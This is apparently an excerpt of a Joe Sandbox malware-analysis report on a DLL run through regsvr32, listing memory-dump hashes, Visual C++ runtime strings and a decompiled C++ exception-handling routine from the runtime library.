                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b24567682a71932b9bd3cac4b142caf72f763870487d30b345218c61caa1d775
                                    • Instruction ID: 3473a0eaf58d43c1d16632198f29a9e85fcf3b0d6ee31105f780c840bc6bd29d
                                    • Opcode Fuzzy Hash: b24567682a71932b9bd3cac4b142caf72f763870487d30b345218c61caa1d775
                                    • Instruction Fuzzy Hash: 0E2148741087848FC398EF28C08A41BBBE0BB9C35CF400B1DF4CAA7265D7B8D6558B0A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                    • API String ID: 242677333-579931786
                                    • Opcode ID: a63f40807382e4d475d486b4876b23bc4dd58b7e370bc0180856c528c8acbbda
                                    • Instruction ID: e2526957761dd222599413fd0adc35655d47e080d41718875d9293ce759d4dec
                                    • Opcode Fuzzy Hash: a63f40807382e4d475d486b4876b23bc4dd58b7e370bc0180856c528c8acbbda
                                    • Instruction Fuzzy Hash: FC32E83290CA8695E7B0CB18EC543EE73A0F784345FA04126D6CD47AA9DB7EE549CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$FileModuleName
                                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                    • API String ID: 1949418964-1840610800
                                    • Opcode ID: b12b1314681225994c561f9efc1de4d9c7126b4e593a535ef46bdf2ab838bdf2
                                    • Instruction ID: 897ec7a8548006b51d3f4e24293aa6cb0eb1e7b087e1f77fa43b78bf07c27b58
                                    • Opcode Fuzzy Hash: b12b1314681225994c561f9efc1de4d9c7126b4e593a535ef46bdf2ab838bdf2
                                    • Instruction Fuzzy Hash: 32F1F636609BC294EAB4CB54E8483AEB3E4F384780F604125DACD43BB9DB7ED185CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$_invalid_parameter
                                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                    • API String ID: 2356156361-2279852085
                                    • Opcode ID: 6f4650fd4357eea9b956771a13d9b8a3362ab7c768ecc2367610c4505c6cb5c5
                                    • Instruction ID: d03840f3f998d79993f45302fffdb67e29e7bb822786765b29bb528846abb06c
                                    • Opcode Fuzzy Hash: 6f4650fd4357eea9b956771a13d9b8a3362ab7c768ecc2367610c4505c6cb5c5
                                    • Instruction Fuzzy Hash: 9DC1E87250DBC681E7B48B15E8403EEA3E1F389784F614126E6CD42BA9DB7ED155CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FileHandleWrite
                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                    • API String ID: 3320372497-2837547082
                                    • Opcode ID: bb867b9cd4420929bdb9afde1297a67263cb8f1db9c8fa78cbb90456e5291ccd
                                    • Instruction ID: 981f8f0912e596e51d2e9e4fc62e3c1b144262c9e2c6e30392df3237f0075012
                                    • Opcode Fuzzy Hash: bb867b9cd4420929bdb9afde1297a67263cb8f1db9c8fa78cbb90456e5291ccd
                                    • Instruction Fuzzy Hash: 9491FE31A1CA8685EBA0DB64E8943BE63E0F384784F604126D6CD47AB9DF3FE545CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                    • API String ID: 2574300362-564504941
                                    • Opcode ID: 6419c91a8387a46f3245e2fe33ee525fa99a19ae0c1292820c60068700cd62ec
                                    • Instruction ID: ae2d570b6cae00db451c80d1d2e323a85726552741c7696ed6bf884c957359fe
                                    • Opcode Fuzzy Hash: 6419c91a8387a46f3245e2fe33ee525fa99a19ae0c1292820c60068700cd62ec
                                    • Instruction Fuzzy Hash: 0F51A735A08A8286E7A09B19FC5476E73E4F784751F605035DACE43A74DF7EE488CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                    • String ID:
                                    • API String ID: 641786319-0
                                    • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                    • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                    • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                    • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 20%
                                    			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                    				long long _v24;
                                    				long long _v32;
                                    				char _v56;
                                    				long long _v64;
                                    				long long _v72;
                                    				char _v80;
                                    				void* _v88;
                                    				void* _v96;
                                    				intOrPtr _v104;
                                    				void* _v112;
                                    				intOrPtr _v120;
                                    				void* _v128;
                                    				char _v132;
                                    				char _v136;
                                    				long long _v144;
                                    				signed int _v152;
                                    				char _v160;
                                    				signed char _v164;
                                    				signed int _v168;
                                    				char _v176;
                                    				char _v184;
                                    				long long _v192;
                                    				signed char _v200;
                                    				long long _v208;
                                    				signed int _v216;
                                    				signed int _v224;
                                    				long long _v232;
                                    				void* _t222;
                                    				void* _t244;
                                    				void* _t295;
                                    				long long _t302;
                                    				long long _t303;
                                    				intOrPtr _t311;
                                    				long long _t312;
                                    				long long _t321;
                                    				intOrPtr _t325;
                                    				long long _t329;
                                    				long long _t330;
                                    				long long _t332;
                                    
                                    				_t295 = __rax;
                                    				_a32 = __r9;
                                    				_a24 = __r8;
                                    				_a16 = __rdx;
                                    				_a8 = __rcx;
                                    				_v164 = 0;
                                    				_v152 = 0;
                                    				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
                                    				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
                                    				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
                                    				r9d = _v168;
                                    				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
                                    				r9d = _v168;
                                    				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                    				goto 0xf9d34197;
                                    				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
                                    				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
                                    				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
                                    				goto 0xf9d341b6;
                                    				_t222 = E000007FE7FEF9D2CF80(_a40);
                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
                                    				_t302 = _a8;
                                    				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
                                    				0xf9d24000();
                                    				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
                                    				goto 0xf9d34862;
                                    				0xf9d24000();
                                    				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                    				_a8 = _t303;
                                    				0xf9d24000();
                                    				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                    				_v164 = 1;
                                    				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                    				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
                                    				goto 0xf9d34295;
                                    				E000007FE7FEF9D2CF80(_a8);
                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
                                    				_t311 = _a8;
                                    				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
                                    				E000007FE7FEF9D2CF80(_t311);
                                    				0xf9d24000();
                                    				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
                                    				0xf9d24000();
                                    				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                    				_v144 = _t312;
                                    				0xf9d24000();
                                    				 *((long long*)(_t312 + 0x108)) = 0;
                                    				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
                                    				goto 0xf9d34398;
                                    				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
                                    				E000007FE7FEF9D35AB0(1, _a8);
                                    				E000007FE7FEF9D34870( &_v56, "bad exception");
                                    				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a160);
                                    				goto 0xf9d34398;
                                    				E000007FE7FEF9D2CF50(_t312);
                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
                                    				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
                                    				if (_a40[3] <= 0) goto 0xf9d3466c;
                                    				_v216 = _a32;
                                    				_v224 =  &_v132;
                                    				_t321 =  &_v136;
                                    				_v232 = _t321;
                                    				r9d = _v168;
                                    				r8d = _a56;
                                    				E000007FE7FEF9D2EA30(_a16, _a40);
                                    				_v128 = _t321;
                                    				goto 0xf9d3447e;
                                    				_v136 = _v136 + 1;
                                    				_v128 = _v128 + 0x14;
                                    				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
                                    				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
                                    				_t325 = _v128;
                                    				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
                                    				goto 0xf9d3445a;
                                    				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                    				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                    				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                    				_v120 = _v120 - 1;
                                    				_t329 = _v112 + 0x14;
                                    				_v112 = _t329;
                                    				if (_v120 <= 0) goto 0xf9d34667;
                                    				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
                                    				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                    				_v96 = _t330;
                                    				E000007FE7FEF9D2E6A0(_t244, _t330);
                                    				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                    				goto 0xf9d3457e;
                                    				_v104 = _v104 - 1;
                                    				_t332 = _v96 + 4;
                                    				_v96 = _t332;
                                    				if (_v104 <= 0) goto 0xf9d34662;
                                    				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
                                    				_v88 = _t332 +  *_v96;
                                    				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
                                    				goto 0xf9d3455a;
                                    				_v152 = 1;
                                    				_v176 = _a48 & 0x000000ff;
                                    				_v184 = _v164 & 0x000000ff;
                                    				_v192 = _a64;
                                    				_v200 = _a56;
                                    				_v208 = _v128;
                                    				_v216 = _v88;
                                    				_v224 = _v112;
                                    				_v232 = _a40;
                                    				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                    				goto 0xf9d34667;
                                    				goto 0xf9d3455a;
                                    				goto L1;
                                    				goto 0xf9d3445a;
                                    				__eax = _v152 & 0x000000ff;
                                    				__eflags = _v152 & 0x000000ff;
                                    				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
                                    				__rax = _a40;
                                    				__eax =  *_a40;
                                    				__eax =  *_a40 & 0x1fffffff;
                                    				__eflags = __eax - 0x19930521;
                                    				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
                                    				__rax = _a40;
                                    				__eflags =  *(__rax + 0x20);
                                    				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
                                    				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                    				_a40 = _a40[8];
                                    				_v32 = __rax;
                                    				goto 0xf9d346cb;
                                    				_v32 = 0;
                                    				__eflags = _v32;
                                    				if (_v32 == 0) goto 0xf9d347d7;
                                    				__rax = _a40;
                                    				__eflags =  *(__rax + 0x20);
                                    				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
                                    				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                    				_a40 = _a40[8];
                                    				__rax = __rax + _a40[8];
                                    				_v24 = __rax;
                                    				goto 0xf9d34712;
                                    				_v24 = 0;
                                    				__rdx = _v24;
                                    				__rcx = _a8;
                                    				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                    				__eflags = __al & 0x000000ff;
                                    				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
                                    				__rax = _a16;
                                    				_v64 = _a16;
                                    				__r9 =  &_v80;
                                    				__r8 = _a40;
                                    				__rdx = _a32;
                                    				__rcx = _a16;
                                    				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
                                    				_v64 = __rax;
                                    				_v72 = 0;
                                    				__eax = _a48 & 0x000000ff;
                                    				_v200 = __al;
                                    				__rax = _a32;
                                    				_v208 = _a32;
                                    				__rax = _a40;
                                    				_v216 = _a40;
                                    				_v224 = 0xffffffff;
                                    				_v232 = 0;
                                    				__r9 = _v64;
                                    				__r8 = _a24;
                                    				__rdx = _a8;
                                    				__rcx = _a16;
                                    				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                    				goto 0xf9d3484c;
                                    				__rax = _a40;
                                    				__eflags =  *(__rax + 0xc);
                                    				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
                                    				__eax = _a48 & 0x000000ff;
                                    				__eflags = _a48 & 0x000000ff;
                                    				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
                                    				__rax = _a64;
                                    				_v208 = _a64;
                                    				__eax = _a56;
                                    				_v216 = _a56;
                                    				__eax = _v168;
                                    				_v224 = _v168;
                                    				__rax = _a40;
                                    				_v232 = _a40;
                                    				__r9 = _a32;
                                    				__r8 = _a24;
                                    				__rdx = _a16;
                                    				__rcx = _a8;
                                    				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
                                    				goto 0xf9d3484c;
                                    				__eax = E000007FE7FEF9D2CF50(__rax);
                                    				0xf9d24000();
                                    				__eflags =  *((long long*)(__rax + 0x108));
                                    				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
                                    				goto 0xf9d34862;
                                    				return E000007FE7FEF9D2CF80(__rax);
                                    			}











































                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                    • String ID: bad exception$csm$csm$csm
                                    • API String ID: 3498492519-820278400
                                    • Opcode ID: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                    • Instruction ID: 7a4295b2110f602878fc3b4740f95154d7254c41b9f584a981bc20edbc55875e
                                    • Opcode Fuzzy Hash: 8c50efc0869d6d00d6f15bc2f3e4a8aa3cd75fee2d20c8f1ee388d100984527e
                                    • Instruction Fuzzy Hash: 6D12D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                    • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 4023976971-2293733425
                                    • Opcode ID: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                    • Instruction ID: 2efa9e2c76ac9a5207add94b1133c9cb1d9f002e85ba24f4cd28f4c384247538
                                    • Opcode Fuzzy Hash: 2e8f2817575abf17236a5f031f9d249ff9066c6c73ed3770e2a1ff63e1bea630
                                    • Instruction Fuzzy Hash: 62023B72A0D7C28AE7B09B24E8447AEB7E4F380349F604125D6DC46AA9DB7EE545CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                    • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                    • API String ID: 530996419-3695252689
                                    • Opcode ID: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                    • Instruction ID: 5e2c1cfd74ac96a9b2e41df821e9bd095c4032b9a62c445e43c495128706d0cc
                                    • Opcode Fuzzy Hash: fa484580cb52892c02ff67f95a17d1b2129cff6d1ab00e5c74c45926566419d1
                                    • Instruction Fuzzy Hash: E2D11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                    • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                    • API String ID: 2192614184-1854130327
                                    • Opcode ID: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                    • Instruction ID: 857da3831ea488476c5fe61a9777edcdb3204cdfae2c6516af70c38e8266575f
                                    • Opcode Fuzzy Hash: 0349e1f67bcf58a9467b2163a48374e143b216b4fcd3e10d2347f4427f3577c7
                                    • Instruction Fuzzy Hash: 97C1F932A0D68286E7B09B55E8547BEB7E0F784344F604126E6CD87AE9CB7EE444CF41
                                    Uniqueness
